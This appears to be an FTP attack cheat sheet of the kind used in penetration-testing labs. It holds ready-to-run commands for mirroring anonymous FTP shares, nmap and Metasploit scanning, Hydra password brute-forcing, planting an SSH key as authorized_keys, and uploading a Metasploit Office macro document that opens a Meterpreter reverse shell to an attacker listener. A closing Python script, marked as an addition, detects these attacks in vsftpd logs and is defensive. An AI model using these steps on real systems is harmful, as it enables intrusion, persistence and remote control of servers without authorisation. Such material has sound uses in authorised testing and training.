FTP 21

Checklist

  • Anonymous login

  • OS version

  • Other software: Check Program Files, yum.log, /bin

  • Password files

  • DLLs: Use for msfpescan / BOF targets

  • Upload potential: Do you have the ability to upload files?

  • Can you trigger execution of uploads?

  • Swap binaries

  • Public exploits: Check for any public exploits for FTP server software

Download All Directories and Files

  1. Mirror FTP directories with anonymous login:

    wget --mirror 'ftp://ftp_user:redcliff@10.10.10.59'
  2. If PASV transfer is disabled:

    wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98'
  3. If PASV is enabled:

    sudo wget --mirror 'ftp://anonymous:anonymous@10.11.1.14'

FTP Information Gathering

  1. Grab FTP Banner via telnet:

    telnet -n 192.168.101.100 21
  2. Grab FTP Certificate if available:

    openssl s_client -connect 192.168.101.100:21 -starttls ftp
  3. Nmap FTP scan:

    • Scan FTP with scripts:

      nmap --script ftp-* -p 21 192.168.101.100
    • Basic FTP scan with version detection:

      nmap -sC -sV 192.168.101.162 --script=ftp-anon
    • Alternative (without brute forcing):

      nmap -p 21 --script="+ftp and not brute and not dos and not fuzzer" -vv -oN ftp $ip
  4. Connect with Browser:

    ftp://anonymous:anonymous@192.168.101.100

Brute Force FTP Login

  1. Hydra Brute Force (Need Username):

    hydra -t 1 -l motherfucker -P rockyou.txt -vV 192.168.101.100 ftp
  2. Hydra with Sparta custom list (Requires Sparta tool):

    hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt -u -f $ip ftp
  3. Msfconsole FTP scanning:

    msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' 
    msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' 
    msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' 
    msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' 
    msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'

SSH Key Deployment via FTP

  1. Generate SSH key:

    ssh-keygen
  2. Upload SSH key via FTP:

    ftp 10.10.10.10        # log in as anonymous / anonymous at the prompt
    put /root/.ssh/id_rsa.pub authorized_keys
  3. SSH into target:

    ssh user@10.10.10.10

FTP Passive Mode Detection

  • Passive mode at login: Indicates potential presence of a firewall in the system.


Exploiting MS Office Evil Macros

First Stage: Set up Reverse Shell

  1. Search for Office macro:

    msfconsole
    search office macro
    use exploit/multi/fileformat/office_word_macro
  2. Set up Meterpreter reverse listener:

    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.119.177
    set disablepayloadhandler false
    run

Second Stage: Upload and Execute Macro

  1. Change file extension:

    sudo mv msf.docm msf.doc
  2. Start Meterpreter listener:

    set payload windows/meterpreter/reverse_tcp
    set exitonsession false
    set lhost 192.168.119.177
    set lport 4444
    run -j
  3. Upload via FTP:

    ftp 10.10.10.10 21
    put msf.doc
    exit
  4. Catch Meterpreter session.
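
Detection side, as an added example (not part of the original cheat sheet): the brute-force, authorized_keys upload and Office document upload steps above all leave entries in the FTP server log. The sketch assumes vsftpd's native log line style; the sample lines, rule names and failure threshold are constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample lines in the style of vsftpd's native log (assumed format).
SAMPLE_LOG = """\
Mon Mar  4 10:01:02 2024 [pid 2101] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Mar  4 10:01:03 2024 [pid 2102] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Mar  4 10:01:04 2024 [pid 2103] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Mar  4 10:05:10 2024 [pid 2110] [ftp] OK LOGIN: Client "198.51.100.9", anon password "anonymous"
Mon Mar  4 10:05:20 2024 [pid 2112] [ftp] OK UPLOAD: Client "198.51.100.9", "/authorized_keys", 565 bytes, 12.10Kbyte/sec
Mon Mar  4 10:06:00 2024 [pid 2112] [ftp] OK UPLOAD: Client "198.51.100.9", "/incoming/msf.doc", 48128 bytes, 310.00Kbyte/sec
Mon Mar  4 10:07:00 2024 [pid 2120] [alice] OK DOWNLOAD: Client "192.0.2.15", "/home/alice/report.pdf", 1024 bytes, 50.00Kbyte/sec
"""

# Shape matched: [pid N] [user] OK|FAIL EVENT: Client "ip"[, "path"]
LINE = re.compile(
    r'\[pid \d+\] \[(?P<user>[^\]]+)\] (?P<status>OK|FAIL) (?P<event>[A-Z]+): '
    r'Client "(?P<client>[^"]+)"(?:, "(?P<path>[^"]+)")?'
)
ANON_USERS = {"ftp", "anonymous"}  # assumed account names for anonymous sessions
KEY_PATH = re.compile(r'(^|/)\.ssh/|(^|/)authorized_keys2?$')
OFFICE_EXT = (".doc", ".docm", ".dotm", ".xls", ".xlsm")

def detect(log_text, fail_threshold=3):
    """Return a sorted list of (client, rule) findings; threshold is an assumed default."""
    findings, failures = set(), Counter()
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue  # CONNECT lines and anything else without a [user] field
        client, user, path = m["client"], m["user"], m["path"] or ""
        if m["event"] == "LOGIN" and m["status"] == "FAIL":
            failures[client] += 1
            if failures[client] >= fail_threshold:
                findings.add((client, "repeated-login-failures"))
        elif m["event"] == "UPLOAD" and m["status"] == "OK":
            if user in ANON_USERS:
                findings.add((client, "anonymous-upload"))
            if KEY_PATH.search(path):
                findings.add((client, "ssh-key-file-upload"))
            if path.lower().endswith(OFFICE_EXT):
                findings.add((client, "office-document-upload"))
    return sorted(findings)

if __name__ == "__main__":
    for client, rule in detect(SAMPLE_LOG):
        print(f"{client}\t{rule}")
```

Any anonymous-upload finding also means the server allows anonymous writes, which is the setting to turn off first.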
